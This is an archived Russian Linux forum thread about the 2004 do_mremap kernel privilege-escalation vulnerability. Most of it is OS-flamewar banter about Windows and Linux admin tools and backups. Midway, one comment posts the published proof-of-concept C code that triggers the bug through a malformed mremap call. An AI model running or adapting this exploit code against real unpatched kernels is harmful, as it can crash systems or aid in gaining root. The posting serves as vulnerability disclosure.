LINUX.ORG.RU

Уязвимость: локальное повышение полномочий в Linux kernel через do_mremap


0

0

Критическая уязвимость найдена в ядрах linux 2.2, 2.4 & 2.6 в коде управления памятью, в системном вызове mremap(2), вследствие некорректной граничной проверки.

>>> Подробности



Проверено: green

Ответ на: комментарий от sS

Банкоматы работают по Х.25 :) Можно организовать доступ в сеть по Х.25 существует технология IP over X.25 ...да что мне тебе то рассказывать, ты же большой-сам знаешь. Так что Х.25 живее всех живых. ;)) там где надежность нужна. :)

anonymous
()

-)

Win'dizm: Жопа случилась и вы будете с ней pаботать.

NT'izm: Случилась? Закрой все. Дааа, жопа случилась.

UNIX'izm: Это не жопа, а патченое микpоядpо.

Linux'izm: Где жопа? Что ты понимаешь в жопах?!!


Всех с рождеством :)

Sun-ch
()
Ответ на: комментарий от sS

Ладно, утомился я.... :( Прости как нить до скорых встречь. :) а то уже спать пора...

anonymous
()
Ответ на: -) от Sun-ch

Так же и тебя. :)

anonymous
()
Ответ на: комментарий от anonymous

Вспоминаем какой-нить wingate версии так 4 с небольшим и работу с
сетевыми картами intel (поглядите его changelog), а лучше с этой
же картой, да еще где все пользователи в домене...
Это же вроде как работа с сетью (небольшой)?

Редкая же дрянь - и такого дерьма вагон. А как насчет чего-нить
стандартного с функциональностью хотя бы iptables?

Какой-то вы странный админ. Чем вы там управляете? У вас все время
что-то меняется или ломается?

Еще страннее, что вы утверждаете, что скрипты - это очень неудобно.
Чем же неудобно? Написал что надо и как хочешь и вперед (можно не с нуля).

Никто вас не ограничит функциональностью гуевого интерфейса.

Или вы тот человек, который замучал всех в прошлый раз удобством
добавления пользователей в новеловские контейнеры на нетвари?
Да, удобно. Но у большинства людей нет нужды каждый день менять
пользователю хз сколько прав.

jackill ★★★★★
()
Ответ на: комментарий от sS

Ну вот, а ты говоришь что он устарел. :) Так что не все пингами проверишь. :) Ладно, искренне удачи всем.

anonymous
()
Ответ на: комментарий от jackill

ты mrtg запускал? Винт не сыпался от стольких телодвижений-это удобно? А ты мне предлагаешь сетку такими скриптами админить...

anonymous
()
Ответ на: комментарий от anonymous

>Ну вот, а ты говоришь что он устарел. :)

А как же иначе ;) просто цикл жизни железяки что банкоматной что для сотовых свитчей куда дольше жизненного цикла софта - у меня знакомый народ весь изматюкался - пися ... пиша ... пи ... ну короче прикручивая более менее актуальные софтверные решения к железякам 5 летней (а может и больше) давности. :)

sS ★★★★★
()
Ответ на: комментарий от anonymous

>>В наше время программеру в принципе некуда устроится нормально, обычно >>из программеров делают установщиков мастдая и это грустно.
А-ха-ха :) Вот я например долгое время писал под масдай. Писал и плевался а от MFC еще и блевал. И не знал что есть linux. Ну не было у меня знакомых linux'оидов. А потом понял что должен узнать систему которая является матерью C/C++. Тянуло меня туда интуитивно. И узнал.
Теперь я больше не виндузятник :) Пишу на C/C++ под linux и просто счастлив. POSIX это не WIN API :) Жалко что столько времени на масдай потрачено, зато врага я знаю в лицо :) Это все по поводу того что программистам податься некуда :) Этот рынок будет только расти и linux программистов будет требоватся все больше и больше, на мою жизнь хватит. :) А масдай должен умереть ! (и это абсолютно серьезно)

anonymous
()
Ответ на: комментарий от anonymous

При чем тут novell и windows? Абсолютно разные системы.
Или ты намекаешь на novell'овские инструменты под винду?
Да, они есть. Только скоро не будет нетвари, а будет линукс,
обвешанный новелловскими удобными инструментами.
А потом под все это дело сделают инструменты под винду :)

jackill ★★★★★
()
Ответ на: комментарий от anonymous

Не боишься что когда мастдай умрет-линукс на его месте окажется? :) Конкуренция нужна любой Ось, а то развития не будет...вот смотри, мастдаю не было конкуренции-он называться стал мастдаем, сейчас линукс составляет конкуренцию-уверен что Мастдай развиваться начнет. :) Потому что не думаю, что Билл захочет разориться. :) Честно говорю, начнет он развиваться и каждая версия будет лучше и лучше. :)

anonymous
()
Ответ на: комментарий от jackill

А я буду только рад когда новелл 7.0 выйдет...Потому что моща линукса будет с мощью новелла сделана....Но это уже будет не совсем Линукс....

anonymous
()
Ответ на: комментарий от anonymous

Кто-то обещал рассказать, что такого умеет в сети винда, чего не умеет
линукс.

Так же просьба прокомментировать то, что MS уже не только freeBSD
использует, но и линуксами не гнушается.

jackill ★★★★★
()
Ответ на: комментарий от jackill

Там видимо мои постинги удалились, но я еще раз повторюсь, что мне все равно что будет Линукс или Мастдай-для меня важней средства управления и мониторинга....их под выньокна и больше и найти легче и все работает. А кто что у кого берет-мне все равно. Я уже как то писал что Билли просто деньгами может купить разработчиков того же ядра и это вполне реально.

anonymous
()
Ответ на: комментарий от jackill

вот смотри даже, опенвью как бы есть, но я не встречал что бы плугины делали производители железа к нему ...под выньдос без проблем...

anonymous
()
Ответ на: комментарий от anonymous

Будут делать-не спорю, но когда? Мне то сейчас надо работать...

anonymous
()
Ответ на: комментарий от anonymous

и согласись же удобно, смотришь-сетка....нажал -вошел в нее....тыкнул на модемную стойку, а она прям как живая...ни каких скриптов ничего...работаешь-аж счастлив...а вы меня в консоль хотите загнать, sql поднимать и думать потом а правильно ли я собрал все или это все просто плохо работает?

anonymous
()
Ответ на: комментарий от anonymous

А теперь представь себе. Все это стояло, работало, было настроено, а теперь я должен чувствовать какую то реальность сносить все и ставить Линукс. Уж лучше на солярис разориться тогда...все проще найти...

anonymous
()
Ответ на: комментарий от anonymous

>> Лениво всю ветку читать...
>> у кого в итоге оказался самый длинный?

Вот первая умная мысль без фанатизма.
И по делу :-)
РЕСПЕКТ !

anonymous
()
Ответ на: комментарий от anonymous

Кстати я не фанатик какой либо Ось...я считаю что каждая ось имеет что то хорошее а в достижение лучшего результата нужно использовать именно лучшие стороны каждого продукта. Удобен линукс как файрвол- я защищу им мастдай который будет делать то, что мне нужно раз не может он сам о себе побеспокоиться. Удобен Линукс как сервер-я буду его использовать... Но он не во всем удобен. :(

anonymous
()
Ответ на: комментарий от anonymous

> Но теперь прикиньте, чудики, десктопную тачку....на ляпихе. какой то министр сидит и апдейтит свое ядро что бы его не завалили? :)

Ну-ну, пожалуйста, поподробнее, как можно "завалить" линуксовый десктоп с http и т.д. клиентами, не слушающий никаких портов, с министром, не работающим под рутом? Видать, вы просто нахватались фраз типа "апдейтит ядро что бы не завалили".

>Что скажем, товарищи, что лучше для десктопа, ляпих или мастдай? :)

1. Толковый линуксоид ставит вашему министру свой любимый дистр линукса, заводит пользователя, устанавливает и настраивает все необходимые приложения, tar-ит себе на флэшку все "~/.файлы" министра, и все довольны.

2. Вы ставите министру "двумя кликами мыши" мастдай с антивирусами. Известно, что виндой рулить может любая домохозяйка, а министр чел не глупый + продвинутый его сынишка научил его кое-чему на домашнем компе, вот и будет у вас секс с апдейтами и переустановками.

>Мля, юзаю и виндз и ляпих

Ну и юзайте дальше.

MOByte
()
Ответ на: комментарий от MOByte

Кстати, переустановки у него будут и на Линуксе, если он будет все правельно тупить. :) Если его сынишка научит....;)

anonymous
()
Ответ на: комментарий от MOByte

И это...почему это он не работающий под рутом? Я здесь стока видел горе админов которые открытый код запустили из под рута...вспомни тему про прогу из одной строки. :) Без рута он же не все может делать. :)

anonymous
()
Ответ на: комментарий от sS

>у меня знакомый народ весь изматюкался - пися ... пиша ... пи ... ну >короче прикручивая более менее актуальные софтверные решения

писав

CyberCoder
()

$ cat mremap_poc.c

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

anonymous
()
Ответ на: комментарий от MOByte

Количество не есть качество

Я это понимаю, но понимаешь ты что я не все использую...я использую то, что меня интересует. Мне не нужны сервера http sql ftp я не программер...задачи другие...

anonymous
()
Ответ на: комментарий от anonymous

>Кстати, переустановки у него будут и на Линуксе, если он будет все правельно тупить. :) Если его сынишка научит....;)

С нерутовскими правами это, вообще-то, не страшно - пусть себе в хоум и ставит. Что-то вы тупите, извиняюсь конечно, но ведь в самом крайнем случае можно почистить и залить с той же флэшки за-tar-енные .файла-папки назад в ~/ , и министр с сыном опять счастливы. А в винде бы был секс.

MOByte
()
Ответ на: комментарий от anonymous

2 великому админу-анонимосу под Выньдозу:
-----------------------------------
...и запстил он сетуп, проинсталлил прогу, увидел
вожделенные менюшки и кнопочки и воскликнул:
-Кто сравнится с этой софтиной!?
-----------------------------------
у меня такое чувство, что это у Вас до первой непонятной проблемы,
после которой вы перероете инет, забросаете письмами и звонками
компанию-автора...
тут народ как я понял поаскетичнее, со скриптами, прогами-кирпичиками
повозится, Юникс-вей, знаете ли, не поленится, зато более полный контроль.
Рене.

anonymous
()
Ответ на: комментарий от anonymous

>Я это понимаю, но понимаешь ты что я не все использую...я использую то, что меня интересует. Мне не нужны сервера http sql ftp я не программер...задачи другие...

Вы можете конкретно сфорулировать свои задачи кроме как "специалист по сетям"? Если вы пользователь каких-то определенных прог под windows, которых нет в эхотаге, то не надо поливать калом линуксоидов, решающих эти проблемы не мышкой, а головой, ибо такие линуксоиды, по ходу, могут решить и другие задачи, для которых нет готовых решений-программ с красивыми кнопками, а вот вы, скорее-всего, спасуете. Извините, если обидел чем-то.

MOByte
()
Ответ на: комментарий от MOByte

И именно по этому я говорю, что линукс не может объять все. Я там говорил как то, что были люди работающие с компами....вроде программер и то делал и это делал, но сейчас все изменилось....хороший программер занимается программами, сетевик сетью, железячник железом. Даже программеры разные...высокоуровневые и низкоуровневыет. Программеры баз данных....Мне будет грустно если Линукс станет мастдаем, а он им хочет стать. :( Он хочет как Мастдай объять ВСЕ!

anonymous
()
Ответ на: комментарий от MOByte

Вы можете конкретно сфорулировать свои задачи кроме как "специалист по сетям"?

С тобой приятно разговаривать.....Я не поливаю линукс грязью.....Ты не обидел меня ни чем. Я мог сегодня обидеть многих=был пьян, но не люблю детского фанатизма в том, что можно решить более грамотным способом...

anonymous
()
Ответ на: комментарий от anonymous

anonymous (*) (06.01.2004 21:03:32)

Ты сам то понял что сказал?

anonymous
()
Ответ на: комментарий от MOByte

> Вы можете конкретно сфорулировать свои задачи кроме как "специалист по сетям"? Если вы пользователь каких-то определенных прог под windows

Fluke Networks/Inspector?

DameWare NT Utilites?

anonymous
()
Ответ на: комментарий от MOByte

С нерутовскими правами это, вообще-то, не страшно - пусть себе в хоум и ставит. Что-то вы тупите, извиняюсь конечно, но ведь в самом крайнем случае можно почистить и залить с той же флэшки за-tar-енные .файла-папки назад в ~/ , и министр с сыном опять счастливы. А в винде бы был секс.

А кто мешает тебе делать то же самое в wyndz? Давай поговорим без эмоций...

anonymous
()
Ответ на: комментарий от anonymous

Fluke Networks/Inspector?

DameWare NT Utilites?

*****

Я не этот анонимус-буду подписываться Andrey что бы ясней картина была...

anonymous
()
Ответ на: комментарий от anonymous

> Я не этот анонимус-буду подписываться Andrey что бы ясней картина была...

Смысл не изменился?

anonymous
()
Ответ на: комментарий от anonymous

Смысл не изменился?

Если ты тот кто постинг про утилиты пустил, то я об этом целый день пишу-утилит мониторинга сети под мастдай больше и они качественно работаю.....

anonymous
()
Ответ на: комментарий от anonymous

solarwinds хотя бы...так что утилит валом под виндз....и он этим рулит...надеюсь линукс рулить будет....

anonymous
()
Ответ на: комментарий от anonymous

> Если ты тот кто постинг про утилиты пустил, то я об этом целый день пишу-утилит мониторинга сети под мастдай больше и они качественно работаю.....

Эт ты погорячился, насчет качества... Так... экземпляры.

Вообще-то, вопрос был не к тебе. Просто, в тему. Аналоги:

Fluke Networks/Inspector

DameWare NT Utilites

???

anonymous
()
Ответ на: комментарий от anonymous

Эт ты погорячился, насчет качества... Так... экземпляры.

Ну не знаю, просто то что ты назвал намного лучше чем mrtg

anonymous
()
Ответ на: комментарий от anonymous

>И именно по этому я говорю, что линукс не может объять все. ... Мне будет грустно если Линукс станет мастдаем, а он им хочет стать. : Он хочет как Мастдай объять ВСЕ!

Это точно. Но, в отличии от MS пользователей, сейчас у линуксоида есть настоящий выбор в этом зоопарке линукс-дистров. Сейчас мы видим производство именно готовых решений больших линукс-компаний для десктопов и серверов отдельно. Также существуют дистры-конструкторы (они, правда, более или менее все такие) типа дебиана, генту и т.д. Получается, что линукс может таки в каком-то смысле объять необъятное + самое главное - выбор.

MOByte
()
Ответ на: комментарий от anonymous

А я могу назвать ZEN который был бог знает когда под мастдай и может быть появится под линукс.....даже на примитивный radmin не зайдешь....

anonymous
()
Ответ на: комментарий от anonymous

сори, обещался быть Андреем... anonymous (*) (06.01.2004 21:34:28)

anonymous
()
Ответ на: комментарий от anonymous

>С нерутовскими правами это, вообще-то, не страшно - пусть себе в хоум и ставит. Что-то вы тупите, извиняюсь конечно, но ведь в самом крайнем случае можно почистить и залить с той же флэшки за-tar-енные .файла-папки назад в ~/ , и министр с сыном опять счастливы. А в винде бы был секс.

>А кто мешает тебе делать то же самое в wyndz? Давай поговорим без эмоций...

Все-таки обидел. Сорри.

И все-таки. Как сделать в windows так, чтобы после всех установленных ненужных и анинсталлированных ползователями (читай министром) нужных программ и переконфигурированных настроек и действий подцепленных макро и не-макро вирусов легко сделать откат на исходную конфигурацию?

В *никсе после установки всех программ и настройки их для пользователя в ~/ будут только файла настроек с очень маленьким весом, а пример процесса бэкапа и отката уже постил - проще некуда.

MOByte
()
Ответ на: комментарий от MOByte

Все-таки обидел. Сорри.

неее, ты меня не обидел!!! Я админ-давай опытом поделимся. То что ты сейчас называешь-бэкапом системы называется.!

И все-таки. Как сделать в windows так, чтобы после всех установленных ненужных и анинсталлированных ползователями (читай министром) нужных программ и переконфигурированных настроек и действий подцепленных макро и не-макро вирусов легко сделать откат на исходную конфигурацию?

Бэкап системы....как и в линуксе. Что бы трояны тебе жизнь не портили ты быкапишь ос

В *никсе после установки всех программ и настройки их для пользователя в ~/ будут только файла настроек с очень маленьким весом, а пример процесса бэкапа и отката уже постил - проще некуда.

А чем мастдай не подходит? У него что ли бэкап другой?

Андрей.

anonymous
()
Ответ на: комментарий от MOByte

Вот смотри, неудачный апдейт системы....чем ты лечишь? Правельно, быкапом ситемы....каждый день у тебя происходит на серверах что? Правельно...бэкапы....потому что раиды-это еще не полная надежность системы....

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.